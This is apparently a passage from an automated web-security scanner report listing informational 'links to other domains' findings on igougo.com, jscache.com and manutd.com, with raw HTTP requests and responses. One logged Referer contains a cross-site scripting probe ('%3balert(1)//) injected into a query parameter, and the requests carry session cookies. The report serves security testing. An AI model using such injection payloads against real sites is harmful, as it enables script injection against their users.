                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=566650180634531856683906250&adsize=728x90&pagepos=2&random=634531856683906250?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=566650180634531856683906250&adsize=728x90&pagepos=2&random=634531856683906250?" border="0"></a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" class="ica i-twitter" target="_blank" rel="nofollow">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/igougo" class="ica i-facebook" target="_blank" rel="nofollow">Facebook</a>
...[SNIP]...
<p class="h3"> This bear is pensive. <a target="_blank" href="http://ow.ly/6JOui">http://ow.ly/6JOui</a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" target="_blank" rel="nofollow" >Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://svc.travelocity.com/mediakit/igougo-brandoverview.html" rel="nofollow" target="_blank">Advertise</a>
...[SNIP]...
<dd><a href="http://www.travelocity.co.in" target="_blank">Travelocity India</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.hk" target="_blank">Zuji Hong Kong</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.sg" target="_blank">Zuji Singapore</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.in" target="_blank">India Hotels</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.au" target="_blank">Zuji Australia</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com" target="_blank">Travelocity</a>
...[SNIP]...
<dd><a href="http://www.travelocity.ca/ca" target="_blank">Travelocity Canada</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com.mx/mx" target="_blank">Travelocity Mexico</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com" target="_blank">USA Hotels</a>
...[SNIP]...
<dd><a href="http://www.fr.lastminute.com" target="_blank">Lastminute.com France</a>
...[SNIP]...
<dd><a href="http://www.it.lastminute.com" target="_blank">Lastminute.com Italy</a>
...[SNIP]...
<dd><a href="http://www.es.lastminute.com" target="_blank">Lastminute.com Spain</a>
...[SNIP]...
<dd><a href="http://www.rejsefeber.dk" target="_blank">Rejsefeber Denmark</a>
...[SNIP]...
<dd><a href="http://www.reisefeber.no/" target="_blank">Reisefeber Norway</a>
...[SNIP]...
<dd><a href="http://www.resfeber.se/" target="_blank">Resfeber Sweden</a>
...[SNIP]...
<dd><a href="http://travelocity.com/LA" target="_blank">Travelocity LatAm</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.co/" target="_blank">Colombia Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.ec/" target="_blank">Ecuador Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.ve/" target="_blank">Venezuela Hotels</a>
...[SNIP]...
<noscript>
   <img src="http://b.scorecardresearch.com/b?c1=2&c2=3005558&c3=&c4=&c5=&c6=&c15=&cv=2.0&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...

19.210. http://www.igougo.com/WebResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196339417056915 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunderda8d5'%3balert(1)//6e4526513fd&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UUIDCookie=fd72388248504134a997b0470a493620; SL_Audience=455|Accelerated|915|12|0; SL_NV12=1|12; __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-1; mbox=check#true#1317601683|session#1317601622475-177474#1317603483|PC#1317601622475-177474.19#1318811230; __utma=179047228.1875149061.1317601642.1317601642.1317601642.1; __utmb=179047228.1.10.1317601644; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D125%3B; SL_UVId=2BC47C1462303C7A

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:49:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36813


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="3N4s99OteDpCXgpNG2PjNUab70AmGz5GNt8h7GVhdJlW5f7uORj9diLS188nzy3C95evwfUCPht+S0+LL/XseWCdGKfWD3MqIININNQGXpT1AOgH8SdbDoTSVkI=" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=1345850578634531853686093750&adsize=728x90&pagepos=1&random=634531853686093750?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=1345850578634531853686093750&adsize=728x90&pagepos=1&random=634531853686093750?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=1345850578634531853686093750&adsize=728x90&pagepos=1&random=634531853686093750?" border="0"></a>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=1345850578634531853686093750&adsize=728x90&pagepos=2&random=634531853686093750?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=1345850578634531853686093750&adsize=728x90&pagepos=2&random=634531853686093750?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=1345850578634531853686093750&adsize=728x90&pagepos=2&random=634531853686093750?" border="0"></a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" class="ica i-twitter" target="_blank" rel="nofollow">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/igougo" class="ica i-facebook" target="_blank" rel="nofollow">Facebook</a>
...[SNIP]...
<p class="h3"> This bear is pensive. <a target="_blank" href="http://ow.ly/6JOui">http://ow.ly/6JOui</a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" target="_blank" rel="nofollow" >Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://svc.travelocity.com/mediakit/igougo-brandoverview.html" rel="nofollow" target="_blank">Advertise</a>
...[SNIP]...
<dd><a href="http://www.travelocity.co.in" target="_blank">Travelocity India</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.hk" target="_blank">Zuji Hong Kong</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.sg" target="_blank">Zuji Singapore</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.in" target="_blank">India Hotels</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.au" target="_blank">Zuji Australia</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com" target="_blank">Travelocity</a>
...[SNIP]...
<dd><a href="http://www.travelocity.ca/ca" target="_blank">Travelocity Canada</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com.mx/mx" target="_blank">Travelocity Mexico</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com" target="_blank">USA Hotels</a>
...[SNIP]...
<dd><a href="http://www.fr.lastminute.com" target="_blank">Lastminute.com France</a>
...[SNIP]...
<dd><a href="http://www.it.lastminute.com" target="_blank">Lastminute.com Italy</a>
...[SNIP]...
<dd><a href="http://www.es.lastminute.com" target="_blank">Lastminute.com Spain</a>
...[SNIP]...
<dd><a href="http://www.rejsefeber.dk" target="_blank">Rejsefeber Denmark</a>
...[SNIP]...
<dd><a href="http://www.reisefeber.no/" target="_blank">Reisefeber Norway</a>
...[SNIP]...
<dd><a href="http://www.resfeber.se/" target="_blank">Resfeber Sweden</a>
...[SNIP]...
<dd><a href="http://travelocity.com/LA" target="_blank">Travelocity LatAm</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.co/" target="_blank">Colombia Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.ec/" target="_blank">Ecuador Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.ve/" target="_blank">Venezuela Hotels</a>
...[SNIP]...
<noscript>
   <img src="http://b.scorecardresearch.com/b?c1=2&c2=3005558&c3=&c4=&c5=&c6=&c15=&cv=2.0&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...

19.211. http://www.igougo.com/WebResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196339417056915 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=detm5oiqzuobkv55byidi4y1; UUIDCookie=fd72388248504134a997b0470a493620; SL_Audience=455|Accelerated|915|12|0; SL_UVId=2BC47C1462303C7A; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:29:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36813


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="7q9zFOyFqTPnc5W06UryrpkD0++Wka0AMjC1S1xA6P1yyTp8PCxurvnrk9jOzADXv65HGKV1PAMbdsNjVp0aWbrCQsVMDW+7SSf9eWpiDrdh5lUG1nQvUBpOJY8=" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=1518210046634531841399843750&adsize=728x90&pagepos=1&random=634531841399843750?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=1518210046634531841399843750&adsize=728x90&pagepos=1&random=634531841399843750?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=1518210046634531841399843750&adsize=728x90&pagepos=1&random=634531841399843750?" border="0"></a>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=1518210046634531841399843750&adsize=728x90&pagepos=2&random=634531841399843750?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=1518210046634531841399843750&adsize=728x90&pagepos=2&random=634531841399843750?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=1518210046634531841399843750&adsize=728x90&pagepos=2&random=634531841399843750?" border="0"></a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" class="ica i-twitter" target="_blank" rel="nofollow">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/igougo" class="ica i-facebook" target="_blank" rel="nofollow">Facebook</a>
...[SNIP]...
<p class="h3"> This bear is pensive. <a target="_blank" href="http://ow.ly/6JOui">http://ow.ly/6JOui</a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" target="_blank" rel="nofollow" >Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://svc.travelocity.com/mediakit/igougo-brandoverview.html" rel="nofollow" target="_blank">Advertise</a>
...[SNIP]...
<dd><a href="http://www.travelocity.co.in" target="_blank">Travelocity India</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.hk" target="_blank">Zuji Hong Kong</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.sg" target="_blank">Zuji Singapore</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.in" target="_blank">India Hotels</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.au" target="_blank">Zuji Australia</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com" target="_blank">Travelocity</a>
...[SNIP]...
<dd><a href="http://www.travelocity.ca/ca" target="_blank">Travelocity Canada</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com.mx/mx" target="_blank">Travelocity Mexico</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com" target="_blank">USA Hotels</a>
...[SNIP]...
<dd><a href="http://www.fr.lastminute.com" target="_blank">Lastminute.com France</a>
...[SNIP]...
<dd><a href="http://www.it.lastminute.com" target="_blank">Lastminute.com Italy</a>
...[SNIP]...
<dd><a href="http://www.es.lastminute.com" target="_blank">Lastminute.com Spain</a>
...[SNIP]...
<dd><a href="http://www.rejsefeber.dk" target="_blank">Rejsefeber Denmark</a>
...[SNIP]...
<dd><a href="http://www.reisefeber.no/" target="_blank">Reisefeber Norway</a>
...[SNIP]...
<dd><a href="http://www.resfeber.se/" target="_blank">Resfeber Sweden</a>
...[SNIP]...
<dd><a href="http://travelocity.com/LA" target="_blank">Travelocity LatAm</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.co/" target="_blank">Colombia Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.ec/" target="_blank">Ecuador Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.ve/" target="_blank">Venezuela Hotels</a>
...[SNIP]...
<noscript>
   <img src="http://b.scorecardresearch.com/b?c1=2&c2=3005558&c3=&c4=&c5=&c6=&c15=&cv=2.0&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...

19.212. http://www.igougo.com/traveldeals/ratefinder.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 00:27:02 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Content-Length: 78193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=ratefinderhotel&tile=1671993858634531840221815835&adsize=728x90&pagepos=1&random=634531840221659588?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=ratefinderhotel&tile=1671993858634531840221815835&adsize=728x90&pagepos=1&random=634531840221659588?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=ratefinderhotel&tile=1671993858634531840221815835&adsize=728x90&pagepos=1&random=634531840221659588?" border="0"></a>
...[SNIP]...
<header>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
<li><a href="http://svc.travelocity.com/mediakit/igougo-brandoverview.html" rel="nofollow" target="_blank">Advertise</a>
...[SNIP]...
<dd><a href="http://www.travelocity.co.in" target="_blank">Travelocity India</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.hk" target="_blank">Zuji Hong Kong</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.sg" target="_blank">Zuji Singapore</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.in" target="_blank">India Hotels</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.au" target="_blank">Zuji Australia</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com" target="_blank">Travelocity</a>
...[SNIP]...
<dd><a href="http://www.travelocity.ca/ca" target="_blank">Travelocity Canada</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com.mx/mx" target="_blank">Travelocity Mexico</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com" target="_blank">USA Hotels</a>
...[SNIP]...
<dd><a href="http://www.fr.lastminute.com" target="_blank">Lastminute.com France</a>
...[SNIP]...
<dd><a href="http://www.it.lastminute.com" target="_blank">Lastminute.com Italy</a>
...[SNIP]...
<dd><a href="http://www.es.lastminute.com" target="_blank">Lastminute.com Spain</a>
...[SNIP]...
<dd><a href="http://www.rejsefeber.dk" target="_blank">Rejsefeber Denmark</a>
...[SNIP]...
<dd><a href="http://www.reisefeber.no/" target="_blank">Reisefeber Norway</a>
...[SNIP]...
<dd><a href="http://www.resfeber.se/" target="_blank">Resfeber Sweden</a>
...[SNIP]...
<dd><a href="http://travelocity.com/LA" target="_blank">Travelocity LatAm</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.co/" target="_blank">Colombia Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.ec/" target="_blank">Ecuador Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.ve/" target="_blank">Venezuela Hotels</a>
...[SNIP]...
<noscript>
   <img src="http://b.scorecardresearch.com/b?c1=2&c2=3005558&c3=&c4=&c5=&c6=&c15=&cv=2.0&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...

19.213. http://www.jscache.com/weimg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jscache.com
Path:   /weimg

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /weimg?itype=langs/en/tripadvisor_logo_207x51-12811-0.gif&lang=en HTTP/1.1
Host: www.jscache.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.getaroom.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 165
Content-Type: application/x-javascript;charset=UTF-8
Expires: Mon, 03 Oct 2011 00:38:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:38:43 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:38:43 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.BC649BA2FF72A3D5B3A8EB2418B261B6*SQ.2*LS.weimg*GR.43*TCPAR.79*TBR.64*EXEX.37*ABTR.55*PPRP.72*PHTB.89*FS.64*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.3*DF.0*FP.%2Fweimg%3Flang%3Den%26itype%3Dlangs%252Fen%252Ftripadvisor_logo_207x51-12811-0%5C.gif*RP.http%3A%2F%2Fwww%5C.getaroom%5C.com%2F*LP.%2Fweimg%3Flang%3Den%26itype%3Dlangs%252Fen%252Ftripadvisor_logo_207x51-12811-0%5C.gif*FS.32*TRA.true; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=A; Domain=.tripadvisor.com; Path=/

document.write( '<img src="http://www.tripadvisor.com/img/cdsi/langs/en/tripadvisor_logo_207x51-12811-0.gif" style="border:none; margin:0;" alt=" TripAdvisor"/>' );

19.214. http://www.manutd.com/One-United/Login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /One-United/Login.aspx

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /One-United/Login.aspx?redirectPath=/en/Fanzone/Competition-And-Polls/Competition.aspx?id={A04F2C18-1A4F-437D-B2BF-26E32C2683B7}&regmode=full HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.8.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); website#lang=en; ASP.NET_SessionId=dsijc245bi5upj3uvvwiumrc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web7
Content-Length: 21902
Expires: Mon, 03 Oct 2011 00:01:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:01:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/styles/css/english.css?v=87" /><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
<li><a href="http://www.manunited.com.cn/">......</a>
...[SNIP]...
<li><a href="http://www.manutd.jp/">.........</a></li><li><a href="http://www.manutd.kr/">.........</a>
...[SNIP]...
<param name="flashvars" value="clicktag=http://www.hublot.com"><a href="http://www.hublot.com"><img src="~/media/Images/TopDevice/backup.ashx" alt="" width="160" height="100" />
...[SNIP]...
<li Title="Click here to view..MU FOUNDATION..-..This link will open in a new window"><a href="http://www.mufoundation.org/" target="_blank">MU FOUNDATION</a>
...[SNIP]...
<noscript><a href="http://adserver.adtech.de/adlink|3.0|999|3173523|0|477|ADTECH;loc=300;key=key1+key2+key3+key4" target="_blank"><img src="http://adserver.adtech.de/adserv|3.0|999|3173523|0|477|ADTECH;cookie=info;loc=300;key=key1+key2+key3+key4" border="0" width="150" height="180"></a>
...[SNIP]...
<div><a href="http://www.premierleague.com/" target="_blank"><img src="~/media/Images/Devices/PremLeague.ashx" alt="Premier League" width="150" height="121" />
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2969561;type=count861;cat=035lo346;ord=1;num=1?" width="1" height="1" frameborder="0" style="display:none"></iframe>
...[SNIP]...
</script><script type="text/javascript" src="http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick="></script><noscript><a href="http://adserver.adtech.de/adlink|3.0|512|2041640|0|16|ADTECH;loc=300;key=key1+key2+key3+key4" target="_blank"><img src="http://adserver.adtech.de/adlink|3.0|512|2041640|0|16|ADTECH;loc=300;key=key1+key2+key3+key4" border="0" width="1" height="1" /></a>
...[SNIP]...
<noscript><a href="http://adserver.adtech.de/adlink|3.0|999|3106021|0|168|ADTECH;loc=300;key=key1+key2+key3+key4" target="_blank"><img src="http://adserver.adtech.de/adserv|3.0|999|3106021|0|168|ADTECH;cookie=info;loc=300;key=key1+key2+key3+key4" border="0" width="120" height="600"></a>
...[SNIP]...
<noscript><a href="http://adserver.adtech.de/adlink|3.0|999|2024223|0|168|ADTECH;loc=300;key=key1+key2+key3+key4&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://adserver.adtech.de/adserv|3.0|999|2024223|0|168|ADTECH;loc=300;key=key1+key2+key3+key4"><img src="&lt;link linktype=&quot;external&quot; url=&quot;http://adserver.adtech.de/adlink|3.0|999|2024223|0|168|ADTECH;loc=300;key=key1+key2+key3+key4&amp;quot; target=&amp;quot;_blank&amp;quot;&amp;
...[SNIP]...
</noscript><a href="http://www.aon.com/unitedin2010?lid=aonbutton" target="_blank" class="adcolumnbtn"><img src="~/media/Images/Buttons/NewButtons/Button_Aon.ashx" alt="" width="120" height="90" /></a><a href="http://www.hublot.com" target="_blank" class="adcolumnbtn"><img src="~/media/Images/Buttons/NewButtons/Button_Hublot.ashx" alt="" width="120" height="90" /></a><a href="http://www.nike.com/nikeos/p/nikefootball/language_tunnel?lid=nikebutton" target="_blank" class="adcolumnbtn"><img src="~/media/Images/Buttons/NewButtons/Button_Nike.ashx" alt="" width="120" height="90" /></a><a href="http://www.mufoundation.org/" target="_blank" class="adcolumnbtn"><img src="~/media/Images/Buttons/NewButtons/Button_Foundation.ashx" alt="Foundation" width="120" height="90" />
...[SNIP]...
<p>Copyright, Manchester United Ltd, 2011 <a href="http://editorial.gettyimages.com/ms_gins/source/frontdoors/manu.aspx" target="_blank" title="This link will open in a new window.">Photography provided by Manchester United Ltd and Getty Images</a>
...[SNIP]...
<li>designed by..
                   <a href="http://www.lightmaker.com" target="_blank" title="Lightmaker">Lightmaker</a>
...[SNIP]...

19.215. http://www.manutd.com/Search-Results.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /Search-Results.aspx

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
